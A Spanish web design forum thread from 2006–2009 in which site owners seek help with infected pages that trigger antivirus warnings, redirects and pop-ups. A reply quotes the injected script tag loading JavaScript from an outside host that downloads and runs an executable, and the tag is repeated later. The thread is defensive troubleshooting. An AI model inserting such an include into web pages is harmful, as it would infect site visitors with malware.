Foros del Web » Diseño web » HTML »

Virus y publicidad en mi web

Estas en el tema de Virus y publicidad en mi web en el foro de HTML en Foros del Web. Hola a todos. No sé muy bien dónde poner este tema, escribo en este apartado, pero si debe ser movido, pido disculpas. La verdad es ...
  #1 (permalink)  
Antiguo 13/07/2006, 05:48
Avatar de franquero  
Fecha de Ingreso: julio-2005
Mensajes: 179
Antigüedad: 8 años, 9 meses
Puntos: 1
Virus y publicidad en mi web

Hola a todos. No sé muy bien dónde poner este tema, escribo en este apartado, pero si debe ser movido, pido disculpas.

La verdad es que estoy desconcertado. Es la primera vez que me pasa algo así.

Resulta que cuando entro en mi web mi antivirus me avisa de que hay peligro de virus. Y me aparece en C: un archivo 198786123412341234.exe

Antes de que pasara esto, me habían empezado a saltar algunos pop-ups, que yo atribuí al contador de http://www.webstats4u.com/, así que tampoco le di mucha importancia. Pero el tema de los virus me tiene preocupadísimo. No sé que hacer, ni cómo ha podido ocurrir.
He llamado a los del hosting. Me han dicho que lo van a mirar pero no parecen tener mucha idea.
He quitado el contador de webstats, pero los virus siguen saliendo. A mí no, pero a mi compañero de curro sí le siguen saliendo y creando el archivo exe, ha borrado los archivos temporales y continúa saliendo el ataque de virus.


Los virus son: js crash loader / win32 goldbun / win32 haxdoor-bk

He observado, que mientras carga mi página, en la parte inferior izquierda del navegador, cuando dice "Abriendo página http://www.mipagina.com..." rápidamente aparece otra web: "Abriendo página http://baarish.co.uk/go.php..."

¿Cómo se ha podido meter esa página en mi web? ¿Le ha pasado esto a alguien? ¿Hay alguna manera de solucionarlo?

Necesito ayuda.
__________________
Es una suerte que la sociedad libre sea más productiva, porque de no haberlo sido jamás se habría tolerado.

Última edición por franquero; 24/01/2007 a las 02:52
  #2 (permalink)  
Antiguo 13/07/2006, 10:17
 
Fecha de Ingreso: agosto-2005
Ubicación: Argentina, Capital Federal
Mensajes: 435
Antigüedad: 8 años, 8 meses
Puntos: 2
Quien lo colocó ahi no te lo sabría decir. El problema es esta línea:
Código:
<script src='http://hotelzonablue.com/index.js'></script>
Si observas el JavaScript que esa línea genera verás símbolos codificados con escape; si los decodificas puedes observar que mediante tecnología asincrónica intentan descargar un .exe a C:\\ y luego ejecutarlo.
Para solucionar tu problema simplemente quita esa línea y ten precaución de no añadir scripts a tu sitio sin saber que contienen dentro.

Saludos.
__________________
R4DS en español | R4DS en inglés
  #3 (permalink)  
Antiguo 17/07/2006, 00:40
Avatar de franquero  
Fecha de Ingreso: julio-2005
Mensajes: 179
Antigüedad: 8 años, 9 meses
Puntos: 1
Muchas gracias por tu ayuda zaqpz.

Ya está solucionado. La verdad es que no recuerdo haber incluido ese código, ya que no sabía ni siquiera para qué estaba puesto ahí. Es imposible que el código se me haya "colado" desde fuera, ¿verdad?

De nuevo muchas gracias.
__________________
Es una suerte que la sociedad libre sea más productiva, porque de no haberlo sido jamás se habría tolerado.
  #4 (permalink)  
Antiguo 24/07/2006, 17:03
 
Fecha de Ingreso: septiembre-2005
Mensajes: 1
Antigüedad: 8 años, 7 meses
Puntos: 0
Aprovecho este mensaje para decir que me pasa lo mismo que al compañero al que le habeis aliviado la existencia.
Desde hace uno o dos meses a la gente que entra en mi web le salen molestos popups de publicidad de ilead.track.it que supuestamente tendria que ser el contador nedstats el que los produjera (por lo que pude indagar en los buscadores), pero lo gracioso es que no tengo ningun tipo de contador en la web, y menos aun el nedstats, pero los popups siguen apareciendo, y mas si utilizas el explorer en vez de Firefox.
Pero el problema de mayor calibre viene de que tambien hay virus de por medio, miren lo que sale cuando se entra en mi web (EDITO)no puedo ponerle las imagenes por que me dicen que necesito al menos 15 mensajes para poner enlaces a otra web :S


Sale un mensaje de instalacion del office, y cuando le das a cancelar a la instalación salta un mensaje de error que cierra todas las ventanas del navegador...



Por si fuera poco tambien hay veces que salta un popup que despierta de esta manera a los antivirus...

La verdad es que ando desesperado, no se de donde puede venir la cosa

Mi website es el que aparece en mi firma, si me pueden echar una mano se lo agradeceria
  #5 (permalink)  
Antiguo 25/07/2006, 10:05
Avatar de franquero  
Fecha de Ingreso: julio-2005
Mensajes: 179
Antigüedad: 8 años, 9 meses
Puntos: 1
Hola nenetaro.
Revisa el código de tu web en búsqueda de scripts que no reconozcas, elimina servicios gratuitos que tengas en tu web. Es lo que yo he hecho y se me ha solucionado.

Fíjate cuando esté cargando tu web, si coge archivos de alguna otra página como me pasaba a mi:
Cita:
Iniciado por franquero
He observado, que mientras carga mi página, en la parte inferior izquierda del navegador, cuando dice "Abriendo página http://www.mipagina.com..." rápidamente aparece otra web: "Abriendo página http://baarish.co.uk/go.php..."
Suerte
__________________
Es una suerte que la sociedad libre sea más productiva, porque de no haberlo sido jamás se habría tolerado.

Última edición por franquero; 24/01/2007 a las 02:53
  #6 (permalink)  
Antiguo 27/07/2006, 08:42
 
Fecha de Ingreso: julio-2006
Mensajes: 11
Antigüedad: 7 años, 8 meses
Puntos: 0
Seguramente esos scripts se colaron al instalar "servicios gratuitos " automaticamente , para otra vez agrega tu mismo directo al codigo cualquier script , asi te aseguras de lo que estas poniendo .
  #7 (permalink)  
Antiguo 27/07/2006, 10:24
Avatar de franquero  
Fecha de Ingreso: julio-2005
Mensajes: 179
Antigüedad: 8 años, 9 meses
Puntos: 1
El caso es que el código del contador gratuito lo puse yo manualmente, por eso me sorprendí tanto cuando zaqpz me indicó esta línea de código:

<script src='http://hotelzonablue.com/index.js'></script>

Todavía no me explico cómo llegó a mi web.

Saludos
__________________
Es una suerte que la sociedad libre sea más productiva, porque de no haberlo sido jamás se habría tolerado.
  #8 (permalink)  
Antiguo 21/08/2008, 15:41
 
Fecha de Ingreso: agosto-2008
Mensajes: 1
Antigüedad: 5 años, 7 meses
Puntos: 0
Respuesta: Virus y publicidad en mi web

En mi caso sucedio lo mismo, mi pagina se redireccionaba sola a sitios de publicidad ajenos a mi pagina, Pense que era algun problema del hueco de seguridad que descubrio Kaminski o algo por el estilo, o incluso que habian entrado a mi Control panel del servidor pero no, como tiene tantos componentes de joomla gratuitos, en alguno de ellos estaba el problema. y he aqui lo nombres:

- Joomla Google Analytics de Joomlafrance
- Xtream Video Player

Los quite y se fueron los banner... espero a alguien le funcione asi
  #9 (permalink)  
Antiguo 20/10/2009, 08:34
(Desactivado)
 
Fecha de Ingreso: octubre-2009
Ubicación: Venezuela
Mensajes: 42
Antigüedad: 4 años, 5 meses
Puntos: 4
Respuesta: Virus y publicidad en mi web

saludos como puedo elinar un virus que tengo en mi web, el hosting es compartido y trabaja con sistema operativo linux me parece muy raro esto y estoy analizando mi programacion y no veo ningun link malisioso
Si pueden colaboral se los agradesco ..

alli tengo una captura de la ventana que me sale cuando coloco el enlace o entro a cualquier pagina


maracaiboenlinea.com/index/images/virus.jpg
  #10 (permalink)  
Antiguo 20/10/2009, 12:46
Avatar de C2am  
Fecha de Ingreso: enero-2009
Ubicación: Rosario, Argentina
Mensajes: 1.964
Antigüedad: 5 años, 2 meses
Puntos: 294
Respuesta: Virus y publicidad en mi web

Hola MaracaiboenLineaCom
fijate que este hilo es del 2006 -08
Mejor abre UN NUEVO TEMA, así consigues ayuda.

Un saludo
__________________
El mundo nada puede contra un hombre que canta en la miseria.
-- Ernesto Sábato--
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 01:10.
SEO by vBSEO 3.3.2